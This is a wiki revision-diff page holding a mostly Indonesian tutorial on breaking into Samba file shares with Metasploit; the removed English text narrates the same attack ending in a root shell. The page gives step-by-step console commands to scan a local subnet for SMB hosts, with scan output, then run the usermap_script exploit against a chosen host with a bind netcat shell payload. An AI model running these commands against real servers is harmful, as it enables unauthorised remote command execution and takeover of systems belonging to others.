Difference between revisions of "Kali Linux: Membobol Network Neighbourhood / SAMBA"

From OnnoWiki
Jump to navigation Jump to search
 
(5 intermediate revisions by the same user not shown)
Line 4: Line 4:
  
  
==Lakukan Enumerasi==
+
==Jalankan msfconsole==
  
 
Ketik di console
 
Ketik di console
  
 
  msfconsole
 
  msfconsole
 
  
 
Akan keluar kira-kira
 
Akan keluar kira-kira
Line 40: Line 39:
  
  
 +
yang lebih sopan, KETIK
  
type “use auxiliary/scanner/smb/smb_version” without quotes and press enter.
+
msfconsole thankyou
  
smbscan
+
Akan keluar
  
You should get a prompt similar to the one above now type “show options” without quotes, this is going to bring up all the different options that can be used with this particular scanner. However, for future reference the show options command works with any module you are trying to use within the framework. (See Screen Shot Below)
 
  
show options
 
  
Now for the SMB version scanning tool it tells you under the show options what parameters must be fulfilled before running the tool. RHOSTS(Remote Hosts) is required to be set, and the number of THREADS also needs to be set. So lets go ahead and do that type: ”set RHOSTS 192.168.1.0/24” without quotations, this sets the RHOSTS to the IP range we are trying to find the SAMBA server on. Now we need to set our THREADS, and THREADS is just the amount of times it will go through and do a scan.
+
      ,          ,
 +
    /            \
 +
    ((__---,,,---__))
 +
      (_) O O (_)_________
 +
          \ _ /            |\
 +
          o_o \  M S F  | \
 +
                \  _____  |  *
 +
                |||  WW|||
 +
                |||    |||
 +
 +
 +
Validate lots of vulnerabilities to demonstrate exposure
 +
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit
 +
 +
        =[ metasploit v4.11.4-2015071403                  ]
 +
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]
 +
+ -- --=[ 432 payloads - 37 encoders - 8 nops            ]
 +
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  
type: “set THREADS 75” without quotes and press enter. After you have set these parameters you will see something similar to below:
+
==Lakukan enumerasi==
  
setthreads
 
  
Now that we have specified all the necessary parameters, all we need to do is type “run” without quotes and Metasploit will begin running our scan on the network. And for this blog I have setup an un-patched SAMBA server to own.
+
KETIK
  
scanresults
+
use auxiliary/scanner/smb/smb_version
 +
show options
  
As you can see the SMB scanner found a host running Samba server version 3.0.20. Now all we need to do is do a quick Google search for Samba 3.0.20 exploits. Take note of the host IP address in this case 192.168.1.13 we will need this later.
+
Keluar
  
search
+
    Name      Current Setting  Required  Description
 +
    ----      ---------------  --------  -----------
 +
    RHOSTS                      yes      The target address range or CIDR identifier
 +
    SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
 +
    SMBPass                    no        The password for the specified username
 +
    SMBUser                    no        The username to authenticate as
 +
    THREADS    1                yes      The number of concurrent threads
  
We found several results this one just happens to be on the Metasploit website itself. So it looks like there is a “command execution vulnerability in Samba,”  and it also gives the module that will be used to exploit our host and deliver a payload, it’s called “username map script” Now back at our console we are going to type: “use exploit/multi/samba/usermap_script” without quotes and press enter.
+
KETIK
  
Now just like with the SMBScanner we can use the show options command to see what parameters must be set before using this exploit module so let’s go ahead and do that. (See Below).
+
set RHOSTS 192.168.0.0/24
 +
set THREADS 75
 +
run
  
showoptions
+
Hasilnya
  
We can see from the show options command that both RHOST (Remote Host) and RPORT (Remote Port) both need to be set before running this exploit. Go ahead and type “set RHOST 192.168.1.13” without quotes. We don’t need to set the RPORT in this case because as you can see in the screen shot it’s current settings are set to 139. Now once you have set all the parameters required to run the exploit, simply type: “exploit” without quotes and Metasploit will begin attacking our SAMBA server.
+
[*] 192.168.0.7:445 could not be identified: Unix (Samba 3.6.3-31a.osstech)
 +
[*] Scanned  44 of 256 hosts (17% complete)
 +
[*] Scanned  68 of 256 hosts (26% complete)
 +
[*] Scanned  78 of 256 hosts (30% complete)
 +
[*] 192.168.0.90:445 is running Windows 7 Professional SP1 (build:7601) (name:HP-PC) (domain:WORKGROUP)
 +
[*] Scanned 152 of 256 hosts (59% complete)
 +
[*] Scanned 153 of 256 hosts (59% complete)
 +
[*] 192.168.0.221:445 could not be identified: Unix (Samba 3.0.37)
 +
[*] Scanned 156 of 256 hosts (60% complete)
 +
[*] Scanned 205 of 256 hosts (80% complete)
 +
[*] Scanned 227 of 256 hosts (88% complete)
 +
[*] Scanned 231 of 256 hosts (90% complete)
 +
[*] Scanned 256 of 256 hosts (100% complete)
 +
[*] Auxiliary module execution completed
  
exploit
+
==exploit==
  
And like magic we have a command shell! Meaning we are in the SAMBA server itself, if we type “ls” without quotes this will list the directory, with this exploit we are in the root folder. Now just to be 100% sure we owned this box, I want you to type “whoami” without quotes and you can see below for yourself the server responded with “root” Good Game Samba Box!
 
  
whoami
+
KETIK
 +
 
 +
use exploit/multi/samba/usermap_script
 +
show options
 +
 
 +
Keluar
 +
 
 +
Module options (exploit/multi/samba/usermap_script):
 +
 +
    Name  Current Setting  Required  Description
 +
    ----  ---------------  --------  -----------
 +
    RHOST                  yes      The target address
 +
    RPORT  139              yes      The target port
 +
 
 +
 +
Exploit target:
 +
 +
    Id  Name
 +
    --  ----
 +
    0  Automatic
  
This concludes the owning Samba Servers blog, I will have more introduction blogs coming soon on the Metasploit framework so stay tuned!
 
  
 +
KETIK
  
 +
set RHOST 192.168.0.7
 +
set payload cmd/unix/bind_netcat
 +
exploit
  
  
 +
Jika sudah selesai
  
 +
quit
  
 
==Referensi==
 
==Referensi==
  
 
* http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/
 
* http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/
 +
* http://infosecninja.blogspot.co.id/2013/07/penetration-testing-samba-server.html
 +
* http://www.wikisecure.net/smbmap-map-smb-shares/

Latest revision as of 08:24, 15 February 2016

Sumber: http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/



Jalankan msfconsole

Ketik di console

msfconsole

Akan keluar kira-kira

  Metasploit Park, System Security Interface
  Version 4.0.5, Alpha E
  Ready...
  > access security
  access: PERMISSION DENIED.
  > access security grid
  access: PERMISSION DENIED.
  > access main security grid
  access: PERMISSION DENIED....and...
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit 

       =[ metasploit v4.11.4-2015071403                   ]
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 


yang lebih sopan, KETIK

msfconsole thankyou

Akan keluar


     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     ||| 


Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit 

       =[ metasploit v4.11.4-2015071403                   ]
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

Lakukan enumerasi

KETIK

use auxiliary/scanner/smb/smb_version
show options

Keluar

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

KETIK

set RHOSTS 192.168.0.0/24
set THREADS 75
run

Hasilnya

[*] 192.168.0.7:445 could not be identified: Unix (Samba 3.6.3-31a.osstech)
[*] Scanned  44 of 256 hosts (17% complete)
[*] Scanned  68 of 256 hosts (26% complete)
[*] Scanned  78 of 256 hosts (30% complete)
[*] 192.168.0.90:445 is running Windows 7 Professional SP1 (build:7601) (name:HP-PC) (domain:WORKGROUP)
[*] Scanned 152 of 256 hosts (59% complete)
[*] Scanned 153 of 256 hosts (59% complete)
[*] 192.168.0.221:445 could not be identified: Unix (Samba 3.0.37)
[*] Scanned 156 of 256 hosts (60% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 227 of 256 hosts (88% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

exploit

KETIK

use exploit/multi/samba/usermap_script
show options

Keluar

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port
 

Exploit target:

   Id  Name
   --  ----
   0   Automatic


KETIK

set RHOST 192.168.0.7
set payload cmd/unix/bind_netcat
exploit


Jika sudah selesai

quit

Referensi